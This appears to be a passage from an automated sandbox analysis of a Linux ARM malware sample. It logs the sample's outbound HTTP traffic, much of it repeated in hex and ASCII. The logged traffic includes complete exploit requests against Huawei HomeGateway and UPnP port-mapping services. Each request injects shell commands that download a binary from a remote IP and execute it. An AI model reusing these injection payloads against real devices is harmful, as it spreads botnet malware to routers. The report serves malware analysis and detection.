30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global traffic
              HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
              Content-Length: 430
              Connection: keep-alive
              Accept: */*
              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
              Source: unknown TCP traffic detected without corresponding DNS query
              Source: arm7, 5234.1.00000000f6abff04.000000008642ee32.r-x.sdmp String found in binary or memory: http://23.94.186.250/..23091t/mips;
              Source: arm7, 5234.1.00000000f6abff04.000000008642ee32.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: arm7, 5234.1.00000000f6abff04.000000008642ee32.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding//%22%3E
              Source: arm7, 5234.1.00000000f6abff04.000000008642ee32.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: arm7, 5234.1.00000000f6abff04.000000008642ee32.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
              Source: arm7 String found in binary or memory: http://upx.sf.net
              Source: unknown
              HTTP traffic detected: POST /picsdesc.xml HTTP/1.1
              Content-Length: 630
              Accept-Encoding: gzip, deflate
              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
              Accept: /
              User-Agent: Hello-World
              Connection: keep-alive
              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding//%22%3E<s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://23.94.186.250/..23091t/mips; chmod +x mips; ./mips</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
              Source: unknown DNS traffic detected: queries for: daisy.ubuntu.com

              System Summary:

              Sample tries to kill many processes (SIGKILL)
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 658, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 720, result: successful
